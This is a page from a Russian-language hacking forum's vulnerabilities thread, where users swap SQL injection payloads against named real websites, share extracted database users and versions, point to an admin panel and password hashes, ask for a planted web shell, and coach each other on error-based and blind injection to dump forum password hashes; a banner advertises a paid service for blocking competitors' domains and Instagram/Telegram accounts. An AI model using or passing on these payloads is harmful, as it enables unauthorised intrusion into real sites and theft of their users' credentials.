УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 79 из 296

Опции темы

Поиск в этой теме

Опции просмотра

#781

26.10.2015, 15:13

segodnya

Guest

Сообщений: n/a

Провел на форуме:
2724

Репутация: 0

Цитата:

Сообщение от Br@!ns

Br@!ns said:
↑
А сами не умеете вообще? учитесь.
http://stop-obman.ru/organizations....*/from/**/user/**/where/**/role='root'))))='1
пароль есть на cmd5
админка по адресу stop-obman.ru/backend будет

спасибо большое, а вы как я вижу шелл залили? если можно в лс дайте.

да тренируюсь на Linux kali, читаю. учусь.

и еще вопрос, это точно md5 да ?

#782

26.10.2015, 16:21

xivi00

Guest

Сообщений: n/a

Провел на форуме:
11341

Репутация: 0

есть тут что нибудь https://smartwm.ru/login-with-social/'

#783

26.10.2015, 16:41

xivi00

Guest

Сообщений: n/a

Провел на форуме:
11341

Репутация: 0

Цитата:

Сообщение от SaNDER

SaNDER said:
↑
если этот 404,то там скорее всего нечего нету .

там 500

#784

26.10.2015, 17:57

BabaDook

Guest

Сообщений: n/a

Провел на форуме:
238786

Репутация: 40

Цитата:

Сообщение от xivi00

xivi00 said:
↑
там 500

ахринеть , о чём говорить 500 ошибка ?

#785

26.10.2015, 18:06

}{@ker

Новичок

Регистрация: 27.04.2007

Сообщений: 4

Провел на форуме:
6240

Репутация: 1

Отправить сообщение для }{@ker с помощью ICQ

phpMyAdmin/scripts/setup.php.Что можете посоветовать?

http://s020.radikal.ru/i723/1510/c2/4993371de002.png

Еще раз,извиняюсь.

#786

27.10.2015, 00:53

BabaDook

Guest

Сообщений: n/a

Провел на форуме:
238786

Репутация: 40

Цитата:

Сообщение от SaNDER

SaNDER said:
↑
shop.faberlic.com/ru/component/consultant/conscontent?layout=edit&idcontenttype=3&returnurl= aHR0cDovL3Nob3AuZmFiZXJsaWMuY29tL3VhL2NvbnNjYXJlZX I=
без всякой авторизации...но при сохрании ошибка CC_SYSTEM_ERROR
http://shop.faberlic.com/component/...vL3Nob3AuZmFiZXJsaWMuY29tL3VhL2NvbnNjYXJlZXI=
пытался XSS юзануть но выводит "alert . Есть идеи?
тут скул ошибка,но я тут не чего,не понятно .
http://shop.faberlic.com/component/catalog?id[]=1000243641377&view=seriesitem
http://shop.faberlic.com/component/...&sort=&taskaction=getlistgoods&view=listgoods

Случайно сканер не ахунейтик? ошибки из-за []

#787

27.10.2015, 16:17

Br@!ns

Guest

Сообщений: n/a

Провел на форуме:
179197

Репутация: 25

Цитата:

Сообщение от xivi00

xivi00 said:
↑
подскажите есть ли тут вообще уязвимость
http://www.regard.ru/ajax/check_order.php?num=4444'
все что можно перепробовал продвижений нет(

С твоей непонятно, но есть другая:

http://www.regard.ru/comparen.htm?i...Value(1,concat(0x3a,(select(versi on())))))='1

или

http://www.regard.ru/comparen.htm?id=e345280615ca44adab458f949c114de1a' +union+select+1,user()+--+

regard@localhost

5.5.44-0+deb7u1-log

Вывод в самом низу страницы (проще в коде глянуть)

#788

27.10.2015, 16:40

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Отправить сообщение для Konqi с помощью ICQ

Цитата:

Сообщение от Br@!ns

Br@!ns said:
↑
С твоей непонятно, но есть другая:

там тоже работает, если передать массив вместо строки.

2 all. перестаньте постить нераскрученные скули и отчеты ваших сканеров. старайтесь все делать сами, а если что то и не выходит то опишите конкретно проблему, что именно не получаеться.

#789

27.10.2015, 17:50

qaz

Guest

Сообщений: n/a

Провел на форуме:
344922

Репутация: 75

Цитата:

Сообщение от psihoz26

psihoz26 said:
↑
https://rdot.org/forum/showpost.php?p=36186&
Тут есть пример эксплуатации

1) почитал обе статьи (http://www.securitylab.ru/news/470546.php)

есть проблемы, например при запросе

Цитата:

Сообщение от None

+procedure+analyse(extractvalue(rand(),concat(0x3a ,version())),1)--+

пишет

Цитата:

Сообщение от None

FUNCTION dbphoto.extractvalue does not exist

как то решается эта проблема?

2) нашел нужные мне таблицу и колонку

Цитата:

Сообщение от None

+procedure+analyse((select+user_password+from+foru m.phpbb_users+limit+1,1),1)--+

тоесть ответ

Цитата:

Сообщение от None

Описание ошибки: Incorrect parameters to procedure 'analyse'

зх как составить запрос чтобы хотяб через блинд вывести данные

#790

27.10.2015, 19:08

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Цитата:

Сообщение от qaz

qaz said:
↑
1) почитал обе статьи (
http://www.securitylab.ru/news/470546.php
)
есть проблемы, например при запросе
пишет
как то решается эта проблема?
2) нашел нужные мне таблицу и колонку
тоесть ответ
зх как составить запрос чтобы хотяб через блинд вывести данные

у вас версия ниже 5.1, используйте другой error-based вектор

Страница 79 из 296

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход